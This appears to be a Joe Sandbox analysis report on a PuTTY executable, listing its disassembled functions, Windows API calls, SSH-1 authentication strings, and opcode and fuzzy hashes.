                            control_flow_graph 3290 410ce3-410cf6 3291 410e23-410e3c call 40b470 * 2 3290->3291 3292 410cfc-410d02 call 449a85 3290->3292 3303 410e3d-410e40 3291->3303 3296 410d07-410d0c 3292->3296 3298 410d83-410da7 call 40b40a 3296->3298 3299 410d0e-410d27 call 449abf 3296->3299 3308 410dc1-410dc4 3298->3308 3306 410d29-410d3b call 44c220 3299->3306 3307 410d7a-410d82 call 449b11 3299->3307 3319 410d54-410d78 call 44def0 call 44c220 3306->3319 3320 410d3d-410d51 call 40b40a 3306->3320 3307->3298 3309 410dc6-410de2 call 40b3b0 3308->3309 3310 410da9-410db4 call 44c4d0 3308->3310 3322 410e06-410e09 3309->3322 3323 410db6-410db8 3310->3323 3324 410dbb-410dbe 3310->3324 3319->3299 3320->3319 3329 410de4-410def call 44c4d0 3322->3329 3330 410e0b-410e21 call 44e5c0 3322->3330 3323->3324 3326 410dc0 3324->3326 3327 410dba 3324->3327 3326->3308 3327->3324 3338 410df1-410dfd 3329->3338 3339 410e00-410e03 3329->3339 3330->3303 3338->3339 3340 410e05 3339->3340 3341 410dff 3339->3341 3340->3322 3341->3339
                            APIs
                              • Part of subcall function 00449A85: RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449A97
                              • Part of subcall function 00449ABF: RegEnumKeyA.ADVAPI32(00000800,?,00000000,00000000), ref: 00449AE7
                            • _strlen.LIBCMT ref: 00410D30
                            • _strcat.LIBCMT ref: 00410D61
                            • _strlen.LIBCMT ref: 00410D6C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$EnumOpen_strcat
                            • String ID: Default Settings
                            • API String ID: 2951032735-575833508
                            • Opcode ID: 6a1ba931c442906fe4b2445d57938f6e461b9110586a87c4de48caf960398cfa
                            • Instruction ID: e3a4a535723c965107ae9caddd67621e34fae7e09d36579ca7fa3ea744b86ee4
                            • Opcode Fuzzy Hash: 6a1ba931c442906fe4b2445d57938f6e461b9110586a87c4de48caf960398cfa
                            • Instruction Fuzzy Hash: B2411671504305AFE7219F52EC41BA777E9FF40318F24842FF89996252EBB8E9C58B48
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043CEAE Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • CreateDialogParamA.USER32(0000006F,00000000,Function_0003C7F4,00000000), ref: 0043CEC0
                            • ShowWindow.USER32(00000000,00000000), ref: 0043CECB
                            • SetActiveWindow.USER32(00000000), ref: 0043CED2
                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 0043CED9
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$ActiveCallbackCreateDialogDispatcherParamShowUser
                            • String ID:
                            • API String ID: 916146323-0
                            • Opcode ID: e6a29d7ba973360bd726891a79e5394b50c5aab0ea5bdef25fa18f616b96e136
                            • Instruction ID: d0b957b0578173de60fb9d8d2a35369a6c172a835c08933b532ecbf9426d740a
                            • Opcode Fuzzy Hash: e6a29d7ba973360bd726891a79e5394b50c5aab0ea5bdef25fa18f616b96e136
                            • Instruction Fuzzy Hash: 4AD0C73114D721BBE2211720BC4DFD93E18EF06757F100071FA01751F287555542CBAD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B41C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                              • Part of subcall function 0043A32E: _strlen.LIBCMT ref: 0043A33E
                            • SetDlgItemTextA.USER32(?,?,00000000), ref: 0043B4A1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileItemModuleNameText_strncpy
                            • String ID: !"Can't happen"$..\windows\winctrls.c
                            • API String ID: 4089977181-3161324462
                            • Opcode ID: dabaeee97bf71a850903d42d0ac4f3543e1a15f9c63e607a90a4a33ed65c2ec4
                            • Instruction ID: 66f516245bc3f37b305ae5251d6c6ffeeab41b87630427fc8edf76734828f293
                            • Opcode Fuzzy Hash: dabaeee97bf71a850903d42d0ac4f3543e1a15f9c63e607a90a4a33ed65c2ec4
                            • Instruction Fuzzy Hash: 8F11552A216141AB8A145B159882F273758EF6D325F18902BFB5887383DF38EC0086DE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B152 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 0043B1B8
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B181
                            • c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 0043B186
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                            • API String ID: 3015471070-3468507388
                            • Opcode ID: b3584394dd797a8044ddcb963ba6de7b65c04569b590fd502cc17f2b99742021
                            • Instruction ID: 367ae41d43e6b46f238b4de05c35f38f3f11e6bf901f54133b0cb958510b028b
                            • Opcode Fuzzy Hash: b3584394dd797a8044ddcb963ba6de7b65c04569b590fd502cc17f2b99742021
                            • Instruction Fuzzy Hash: CCF0AF31200200EFEF208A08EC61F2637A5EF8D361F11102AF24497264C739AD50CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                            Download Yara Rule
                            APIs
                            • SetDlgItemTextA.USER32(?,?,?), ref: 0043B097
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B07A
                            • c && c->ctrl->generic.type == CTRL_EDITBOX, xrefs: 0043B07F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemText
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_EDITBOX
                            • API String ID: 3367045223-1421371545
                            • Opcode ID: 045661dc7d2bca4fd63635037739c3ee32d4be041cd9da41a4878a8d3a8272d8
                            • Instruction ID: ed3d365973bb1f30652e9ac7b9db296450869d6ae95ebda871ee53c2bbf07035
                            • Opcode Fuzzy Hash: 045661dc7d2bca4fd63635037739c3ee32d4be041cd9da41a4878a8d3a8272d8
                            • Instruction Fuzzy Hash: C6E09235240601FFD7156B09EC05D177BB5EFC5711B15442AF594A3225DB359C20CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043C7F9 Relevance: 4.6, APIs: 3, Instructions: 62windowCOMMON
                            Download Yara Rule
                            APIs
                            • _strlen.LIBCMT ref: 0043C82B
                            • SendMessageA.USER32(?,00001100,00000000,FFFF0000), ref: 0043C84E
                            • SendMessageA.USER32(?,00001102,00000001), ref: 0043C86B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: MessageSend$_strlen
                            • String ID:
                            • API String ID: 3697954797-0
                            • Opcode ID: fc63fa3c66d52847dfbc6a1d601b4c12d9fbe1c9888f89301be1e32539c926e5
                            • Instruction ID: 4d56353ba58f8e0150e24cdadb7815a3810973388709472ff102041561a09742
                            • Opcode Fuzzy Hash: fc63fa3c66d52847dfbc6a1d601b4c12d9fbe1c9888f89301be1e32539c926e5
                            • Instruction Fuzzy Hash: 31119076900205AFDB14DF6DDC80AABBBFAEB88341F10842EE605E7354D770E9018B44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043987A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageA.USER32(?,00000401,00000003,00000000), ref: 004398B7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: BUTTON
                            • API String ID: 3850602802-3405671355
                            • Opcode ID: 60eb6f9bf705cbda3e92b9764ff72399988e481c5efb0451e521e4d3bfe5e29c
                            • Instruction ID: a8bf25ec533c634574c1c5cb0ff8392c172785704ddbb9cf6244cb2ecae27a7a
                            • Opcode Fuzzy Hash: 60eb6f9bf705cbda3e92b9764ff72399988e481c5efb0451e521e4d3bfe5e29c
                            • Instruction Fuzzy Hash: A701B1B2900214ABCF01DF99DC89A9BBBB8FF09710F004455FD04AB201D3B59A50CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00449A85 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449A97
                            Strings
                            • Software\SimonTatham\PuTTY\Sessions, xrefs: 00449A8D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Open
                            • String ID: Software\SimonTatham\PuTTY\Sessions
                            • API String ID: 71445658-490553574
                            • Opcode ID: f2d454eaa4a4e207f7131034712221743df05d3dafba3a1bf862721c257787a2
                            • Instruction ID: d7e30ddfd2c8cd2038b7680860c7a3b3b8af214bf290fc1166bdfb7b4db984cc
                            • Opcode Fuzzy Hash: f2d454eaa4a4e207f7131034712221743df05d3dafba3a1bf862721c257787a2
                            • Instruction Fuzzy Hash: 90E08632304304AFF7059B519C06F5737D8DB00715F20407AA605E61C2EBB5D90496A8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004464BD Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040B40A: _strcat.LIBCMT ref: 0040B457
                            • GetSystemDirectoryA.KERNEL32(00000000), ref: 004464E6
                            • LoadLibraryA.KERNELBASE(00000000), ref: 0044650C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: DirectoryLibraryLoadSystem_strcat
                            • String ID:
                            • API String ID: 2050214517-0
                            • Opcode ID: fdb3e6400305330744a58eae1b49b1f14f36ab475190f66d14919455bec471f2
                            • Instruction ID: 565c60d519c87358ad28836d8a3910cd9ae3feee4e6f7c32821a8770a67e6fe0
                            • Opcode Fuzzy Hash: fdb3e6400305330744a58eae1b49b1f14f36ab475190f66d14919455bec471f2
                            • Instruction Fuzzy Hash: E1F027B250261067D7102735BC0AF6A3A9AEB40310F0A0436FA0CE21A2E738CC8082DD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00451AA1 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                            Download Yara Rule
                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,0044F1F2,00000000,?,00470420,00000060), ref: 00451AB2
                              • Part of subcall function 00451AF2: HeapAlloc.KERNEL32(00000000,00000140,00451ADA,000003F8,?,00470420,00000060), ref: 00451AFF
                            • HeapDestroy.KERNEL32(?,00470420,00000060), ref: 00451AE5
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Heap$AllocCreateDestroy
                            • String ID:
                            • API String ID: 2236781399-0
                            • Opcode ID: d1654e0251d65cbc67f740f36ef16aa9225511938ca30661f5215625d75a744c
                            • Instruction ID: 18d30e0c95b9f21589a7a1d93f9bc69889178c57aae9f871159868bfd2d6f31e
                            • Opcode Fuzzy Hash: d1654e0251d65cbc67f740f36ef16aa9225511938ca30661f5215625d75a744c
                            • Instruction Fuzzy Hash: 38E04F7065A3019ADF1AAFB1AD4972736D8DB48747F04443BF805C52B2FB78CC88EA08
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040B625 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat_strlen
                            • String ID:
                            • API String ID: 432593777-0
                            • Opcode ID: b6b559fc5d5b3d70033f47ccfdabbc56488c061c704164d51dbee69b30ea63e9
                            • Instruction ID: e77a959d8629673ac4fb426147a5f42340aed75c0023faf46da6063d37a8901d
                            • Opcode Fuzzy Hash: b6b559fc5d5b3d70033f47ccfdabbc56488c061c704164d51dbee69b30ea63e9
                            • Instruction Fuzzy Hash: 77D0A762A0152035D420316A2C01D6FD55DCFD1F64B1A046FBD04E7346D6B98C0241FD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044E1C3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00451816,00000000,0044E219,000000E0,0044E244,00451816,00451816), ref: 0044E201
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 8087e779610d4cb69a36fca964b273f9ba92ddba104793a748657cd1434c99db
                            • Instruction ID: bf625e2cbad2003d74e4a963302e9bf0762ab89b2b71782f998d68df5dbc0699
                            • Opcode Fuzzy Hash: 8087e779610d4cb69a36fca964b273f9ba92ddba104793a748657cd1434c99db
                            • Instruction Fuzzy Hash: 71E0DF3288963097FA25672AFC042473698FB01326B090133FC18723A0C7387D80C6CC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004468BB Relevance: 1.5, APIs: 1, Instructions: 17networkCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WS2_32(?,004769F0), ref: 004468CC
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            • Opcode ID: b7a06d4ceea11967789b343cabe8bf718d818d750cdfecdc66330de89663deb9
                            • Instruction ID: 4ec078f534ec380a903a1b1d8e669dd509f6b10928b06d873fd6e6b92e9baaa2
                            • Opcode Fuzzy Hash: b7a06d4ceea11967789b343cabe8bf718d818d750cdfecdc66330de89663deb9
                            • Instruction Fuzzy Hash: 53D0A9C234B7C02E97100BB02DA058BAF8E1A860A0B1E89BAA28CC1042C238C0888315
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00415405 Relevance: 189.2, APIs: 8, Strings: 99, Instructions: 1934COMMON
                            Download Yara Rule
                            Strings
                            • )., xrefs: 00416911
                            • TIS challenge packet was badly formed, xrefs: 00416288
                            • Public key packet not received, xrefs: 00415544
                            • SSH-1 public key packet stopped before random cookie, xrefs: 0041557D
                            • Received public keys, xrefs: 0041554E
                            • Pageant's response not accepted, xrefs: 004161C8
                            • , xrefs: 004155DB
                            • Pageant key list packet was truncated, xrefs: 004166A1
                            • Received TIS challenge, xrefs: 00416295
                            • Authenticated using RSA key ", xrefs: 00416194
                            • SSH-1 public key encryptions failed due to bad formatting, xrefs: 0041580D
                            • Pageant key #%d matches configured key file, xrefs: 004166BB
                            • login as: , xrefs: 00415B14
                            • \{E, xrefs: 004158B0
                            • 0 && "unexpected return from loadrsakey()", xrefs: 00416893
                            • Failed to get reply from Pageant, xrefs: 004166FE
                            • SSH password, xrefs: 00416B0A
                            • Pageant has %d SSH-1 keys, xrefs: 00416593
                            • Requested TIS authentication, xrefs: 0041695F
                            • Using CryptoCard authentication.%s%s, xrefs: 00416AAC
                            • Access denied, xrefs: 004163ED
                            • Response: , xrefs: 00416304, 00416A88
                            • Pageant failed to answer challenge, xrefs: 00415FA7
                            • Key refused, xrefs: 00415B76
                            • " from agent, xrefs: 004161B1
                            • cipher, xrefs: 00415912
                            • CryptoCard challenge packet was badly formed, xrefs: 004169EF
                            • SSH TIS authentication, xrefs: 004162AE
                            • CryptoCard authentication refused., xrefs: 0041647D
                            • Wrong passphrase., xrefs: 00416877
                            • No passphrase required., xrefs: 0041678B
                            • yRB, xrefs: 004159D5
                            • SSH CryptoCard authentication, xrefs: 00416A2B
                            • Pageant is running. Requesting keys., xrefs: 004164DE
                            • AES not supported in SSH-1, skipping, xrefs: 00415873
                            • Using TIS authentication.%s%s, xrefs: 00416328
                            • Server refused our public key., xrefs: 0041604C
                            • Host key fingerprint is:, xrefs: 004155C8
                            • Trying public key authentication., xrefs: 00416737
                            • Server violates SSH-1 protocol by not supporting 3DES encryption, xrefs: 004158E2
                            • %.*s, xrefs: 004162E8, 004162FA, 00416A6C, 00416A7E
                            • Trying to enable encryption..., xrefs: 004159A8
                            • Received CryptoCard challenge, xrefs: 00416A12
                            • Trying Pageant key #%d, xrefs: 004166D3
                            • Unexpected data from server while waiting for agent response, xrefs: 00415F41
                            • TIS authentication declined, xrefs: 00416240
                            • Authentication refused, xrefs: 004163FA
                            • Unexpected data from server while waiting for user response, xrefs: 00415494
                            • [RB, xrefs: 004159DC
                            • TIS authentication refused., xrefs: 0041625B
                            • Encryption not successfully enabled, xrefs: 00415AA4
                            • Pageant reported negative key count %d, xrefs: 0041657A
                            • Pageant's response accepted, xrefs: 00416179
                            • User aborted at cipher warning, xrefs: 004154D8
                            • No reply received from Pageant, xrefs: 00415FC5
                            • Encrypted session key, xrefs: 0041581F
                            • pwlen >= bottom && pwlen <= top, xrefs: 00416BD6
                            • Unable to authenticate, xrefs: 004168C6
                            • Failed to read SSH-1 public keys from public key packet, xrefs: 00415A82
                            • Using single-DES encryption, xrefs: 0041595E
                            • Trying public key "%s", xrefs: 0041675E
                            • Successfully started encryption, xrefs: 00415ABA
                            • Sent username "%s", xrefs: 00415EE9
                            • Sending length-padded password, xrefs: 00416CDD
                            • Reading private key file "%.150s", xrefs: 00415D61
                            • SSH-1 public keys were badly formatted, xrefs: 00415A78
                            • User aborted at host key verification, xrefs: 00415529
                            • gvE, xrefs: 004162D2
                            • Sending Pageant's response, xrefs: 00415F77
                            • Unable to load private key file "%.150s" (%s), xrefs: 00415DDC
                            • Sending password with camouflage packets, xrefs: 00416C5D
                            • Failed to authenticate with our public key., xrefs: 0041601F
                            • No supported authentication methods available, xrefs: 00416AEE
                            • Unexpected data from server while waiting for user host key response, xrefs: 004154F7
                            • Bizarre response to RSA authentication response, xrefs: 0041602F
                            • Using 3DES encryption, xrefs: 00415957
                            • Initialised %s encryption, xrefs: 004159FA
                            • Bizarre response to offer of public key, xrefs: 00416061
                            • Server's RSA challenge was badly formatted, xrefs: 0041607A
                            • No supported ciphers found, xrefs: 004158EC
                            • gvE, xrefs: 00416A56
                            • Couldn't load private key from , xrefs: 004168E0
                            • Using Blowfish encryption, xrefs: 00415950
                            • rsa, xrefs: 0041573B
                            • Passphrase for key "%.100s": , xrefs: 004167C4
                            • Strange packet received, type %d, xrefs: 00416417
                            • CryptoCard authentication declined, xrefs: 0041646D
                            • Unable to use key file "%.150s" (%s), xrefs: 00415E2E
                            • Configured key file not in Pageant, xrefs: 00416225
                            • %s@%s's password: , xrefs: 00416B2E
                            • Received RSA challenge, xrefs: 00415B8D
                            • Unable to load private key (%s), xrefs: 00415DBE
                            • No username provided, xrefs: 00415E9D
                            • Requested CryptoCard authentication, xrefs: 0041638F
                            • Installing CRC compensation attack detector, xrefs: 00415A0A
                            • Unable to use this key file (%s), xrefs: 00415E0C
                            • Authentication successful, xrefs: 004169BD
                            • Sent password, xrefs: 00416D51
                            • ..\ssh.c, xrefs: 0041688E, 00416BD1
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
